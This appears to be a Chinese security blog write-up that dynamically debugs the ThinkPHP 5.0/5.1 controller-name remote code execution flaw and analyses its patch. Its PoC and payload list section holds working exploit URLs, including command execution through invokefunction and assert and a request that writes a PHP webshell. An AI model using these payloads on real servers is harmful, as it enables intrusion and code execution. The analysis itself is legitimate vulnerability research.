0x01 前言
这个漏洞已经过去了十多天了,最近比较忙,一直没有写分析的文章。今天抽点时间出来写一篇动态分析的文章,远程执行漏洞用动态分析比较方便也看出整个执行的过程和一些变量参数。
ThinkPHP官方最近修复了一个严重的远程代码执行漏洞。这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。
0x02 环境
程序源码下载:http://www.thinkphp.cn/download/967.html Web环境:Windows 10 x64+PHPStudy 2018 调试工具:phpstorm+xdebug(用vscode也可以,我比较习惯用phpstorm)
xdebug调试配置可以参考我的一篇文章https://getpass.cn/2018/04/10/Breakpoint%20debugging%20with%20phpstorm+xdebug/
因为我是从头分析到尾,所以要在设置里面勾上Break at first line in PHP script
搭建就不多说了,放源码在根目录然后phpstudy启动!
0x03 漏洞复现
奉上我们的Poc:http://getpass.test/public/index.php?s=index/\think\Request/input&filter=phpinfo&data=1
其实有很多利用的地方,到后面分析完再说。
0x04 漏洞分析
因为是从开始分析,也比较适合新手,虽然啰嗦了点哈,我就不演示去下某个断点了,如果有不懂的你们也可以在不懂的地方下一个断点然后继续分析(记得去掉Break at first line in PHP script再下断点)。
有些不是重点的直接F7或者F8走下去,F7跟进Facade
到App.php初始化的地方,继续F8往下面走
到routeCheckF7跟进去
到这里F7继续跟进去
有些没有必要的函数就直接F8跳过去,到pathinfo()这里F7跟进去
我们可以分析一下这个·pathinfo函数的代码$this->config->get('var_pathinfo')这一句是从配置文件config/app.php获取的值
当请求报文包含$_GET['s'],就取其值作为pathinfo,并返回pathinfo给调用函数,所以我们可利用$_GET[’s’]来传递路由信息。
public function pathinfo()
{
if (is_null($this->pathinfo)) {
if (isset($_GET[$this->config->get('var_pathinfo')])) {
// 判断URL里面是否有兼容模式参数
$_SERVER['PATH_INFO'] = $_GET[$this->config->get('var_pathinfo')];
unset($_GET[$this->config->get('var_pathinfo')]);
} elseif ($this->isCli()) {
// CLI模式下 index.php module/controller/action/params/...
$_SERVER['PATH_INFO'] = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : '';
}
// 分析PATHINFO信息
if (!isset($_SERVER['PATH_INFO'])) {
foreach ($this->config->get('pathinfo_fetch') as $type) {
if (!empty($_SERVER[$type])) {
$_SERVER['PATH_INFO'] = (0 === strpos($_SERVER[$type], $_SERVER['SCRIPT_NAME'])) ?
substr($_SERVER[$type], strlen($_SERVER['SCRIPT_NAME'])) : $_SERVER[$type];
break;
}
}
}
$this->pathinfo = empty($_SERVER['PATH_INFO']) ? '/' : ltrim($_SERVER['PATH_INFO'], '/');
}
return $this->pathinfo;
}
可以看到return $this->pathinfo;返回的内容
F7走,可以看到$pathinfo赋值给$this->path
F7走到check的函数,如果开启了强制路由则会抛出异常,也就是说该漏洞在开启强制路由的情况下不受影响,但是默认是不开启的。
后面看到实例化了UrlDispatch对象,将$url传递给了构造函数。
再继续分析下去,中间有些不必要的直接F8走过就行了。可以看到将$url传递给了$action
F7走下去,跳回了App.php,可以看到$dispatch返回来的值代入dispatch方法。
F7走进去,可以看到传入的 $dispatch赋值给了$this->dispatch,不过现在分析这个版本是有改动的,有些版本是在这里用dispatch代入下面会分析到的parseUrl方法,这个版本的是用$this->action来parseUrl方法的,继续分析下去,下面会分析到的。
F7又返回了App.php的文件,可以看到执行调度这里$data = $dispatch->run();,我们F7跟进去
这里就是上面所说的,$url是由thinkphp/library/think/route/Dispatch.php里面的$this->action = $action;传过来的。
我们F7继续分析parseUrl方法,然后F8走到这里
F7进到这个parseUrlPath方法里面,用/来分割[模块/控制器/操作]并存到$path 数组里面
private function parseUrlPath($url)
{
// 分隔符替换 确保路由定义使用统一的分隔符
$url = str_replace('|', '/', $url);
$url = trim($url, '/');
$var = [];
if (false !== strpos($url, '?')) {
// [模块/控制器/操作?]参数1=值1&参数2=值2...
$info = parse_url($url);
$path = explode('/', $info['path']);
parse_str($info['query'], $var);
} elseif (strpos($url, '/')) {
// [模块/控制器/操作]
$path = explode('/', $url);
} elseif (false !== strpos($url, '=')) {
// 参数1=值1&参数2=值2...
parse_str($url, $var);
} else {
$path = [$url];
}
return [$path, $var];
}
中间的继续F8往下走,返回的$route数组
继续往下走,F7进去
可以看到thinkphp/library/think/route/Dispatch.php类这里的$this->action的值变了。
继续会走到thinkphp/library/think/route/dispatch/Module.php,可以看到$this->action赋值给了$result
F8往下走,走到实例化控制器,这里的$controller是可控的,是由上面的$result[1]传过来的
$controller = strip_tags($result[1] ?: $this->app->config('app.default_controller'));
F7跟进去,当$name存在反斜杠时就直接将$name赋值给$class并返回。攻击者通过控制输入就可以操控类的实例化过程,从而造成代码执行漏洞。
下面就是调用反射执行类的步骤了
也可以往下看,这里是通过invokeMethod 函数动态调用方法的地方,可以看到$class是think\Requset的类,$method是input
后面就是把内容输出到浏览器的过程了
0x05 漏洞分析回顾
我们从POC来分析执行过程http://getpass.test/public/index.php?s=index/\think\Request/input&filter=phpinfo&data=1
- 开始我们分析
pathinfo()函数的时候得只可以用s来获取路由信息 parseUrlPath方法用来分割[模块/控制器/操作]格式- 在后面传入
$controller的时候,就是开始我们获取到路由的值,但是用反斜杠就开头,就是想要实例化的类 - 最后是反射函数,调用了
input方法执行phpinfo()
一定是要Request类里面的input方法来执行吗?
不一定,视版本而决定。
以下是先知大神分类出来的
5.1是下面这些:
think\Loader
Composer\Autoload\ComposerStaticInit289837ff5d5ea8a00f5cc97a07c04561
think\Error
think\Container
think\App
think\Env
think\Config
think\Hook
think\Facade
think\facade\Env
env
think\Db
think\Lang
think\Request
think\Log
think\log\driver\File
think\facade\Route
route
think\Route
think\route\Rule
think\route\RuleGroup
think\route\Domain
think\route\RuleItem
think\route\RuleName
think\route\Dispatch
think\route\dispatch\Url
think\route\dispatch\Module
think\Middleware
think\Cookie
think\View
think\view\driver\Think
think\Template
think\template\driver\File
think\Session
think\Debug
think\Cache
think\cache\Driver
think\cache\driver\File
5.0 的有:
think\Route
think\Config
think\Error
think\App
think\Request
think\Hook
think\Env
think\Lang
think\Log
think\Loader
两个版本公有的是:
think\Route
think\Loader
think\Error
think\App
think\Env
think\Config
think\Hook
think\Lang
think\Request
think\Log
5.1.x php版本>5.5:
http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert
http://127.0.0.1/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>
5.0.x php版本>=5.4:
http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
这里也不写getshell的python脚本了 ,可以参考
https://github.com/theLSA/tp5-getshell
https://payloads.online/archivers/2018-12-05/1
0x06 补丁分析
下面是针对5.0和5.1的补丁,添加了正则过滤,导致无法再传入\think\app这种形式的控制器。
0x07 结束
很多天没发文章,这个洞还是蛮厉害的,前段时间爆发的时候还看到有人用这个洞扫全网的ip。
0x08 参考
https://www.secpulse.com/archives/92835.html
https://www.kancloud.cn/manual/thinkphp5_1/353946
http://www.lsablog.com/networksec/penetration/thinkphp5-rce-analysis/
- 原文作者: F0rmat
- 原文链接: https://xxe.icu/thinkphp5-remote-code-execution-vulnerability-dynamic-analysis.html
- 版权声明:本作品采用 署名 - 非商业性使用 4.0 国际 (CC BY-NC 4.0)进行许可,非商业转载请注明出处(作者,原文链接),商业转载请联系作者获得授权。